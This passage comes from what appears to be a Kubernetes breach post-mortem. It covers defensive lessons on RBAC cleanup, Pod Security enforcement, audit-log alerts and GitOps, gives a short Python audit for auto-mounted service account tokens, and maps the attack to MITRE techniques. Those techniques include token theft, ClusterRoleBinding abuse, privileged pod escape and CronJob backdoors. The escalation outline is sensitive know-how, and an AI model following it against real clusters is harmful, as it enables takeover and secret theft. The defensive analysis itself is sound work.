  3. Legacy RBAC bindings accumulate as hidden privilege escalation paths — The legacy-monitoring-binding granting cluster-admin to monitoring-sa was created years ago and never cleaned up. Regular RBAC audits must identify and remove overprivileged bindings. Tools like rbac-police and kubectl-who-can help map escalation paths.

  4. Pod Security Standards must be enforced, not just audited — Running admission controllers in audit mode provides visibility but not prevention. The privileged pod that enabled host escape would have been blocked by "restricted" Pod Security Standards in enforce mode.

  5. Kubernetes audit logs are the primary detection surface — Every API call to the Kubernetes API server is logged. High-fidelity detections for ClusterRoleBinding changes, privileged pod creation, cross-namespace secret access, and service account creation in kube-system are essential baseline alerts.

  6. GitOps workflows provide an RBAC choke point — When all cluster changes flow through a GitOps controller (ArgoCD, Flux), direct API access by service accounts can be heavily restricted. Any cluster mutation not originating from the GitOps controller is immediately suspicious.
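
The first takeaway can be enforced mechanically. A simplified audit sketch for `automountServiceAccountToken` (a real audit must also consider the ServiceAccount-level setting and projected token volume sources):

```python
# Find pods that still auto-mount a service account token (takeaway 1).
# Simplified: the field also exists on the ServiceAccount and the pod-level
# value wins; this sketch inspects pod specs only.
def automount_findings(pods: list) -> list:
    findings = []
    for pod in pods:
        # Absent field defaults to true -> token is mounted
        if pod["spec"].get("automountServiceAccountToken", True):
            findings.append(pod["metadata"]["name"])
    return findings

pods = [
    {"metadata": {"name": "build-runner"}, "spec": {}},
    {"metadata": {"name": "static-web"},
     "spec": {"automountServiceAccountToken": False}},
]
print(automount_findings(pods))  # ['build-runner']
```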

MITRE ATT&CK Mapping

Technique ID Technique Name Phase
T1078.004 Valid Accounts: Cloud Accounts Initial Access (SA token theft)
T1613 Container and Resource Discovery Discovery (RBAC enumeration)
T1098 Account Manipulation Privilege Escalation (ClusterRoleBinding creation)
T1611 Escape to Host Privilege Escalation (privileged pod breakout)
T1078.004 Valid Accounts: Cloud Accounts Lateral Movement (cross-namespace secret access)
T1053.007 Scheduled Task/Job: Container Orchestration Job Persistence (CronJob backdoor)
T1136.001 Create Account: Local Account Persistence (backdoor service account)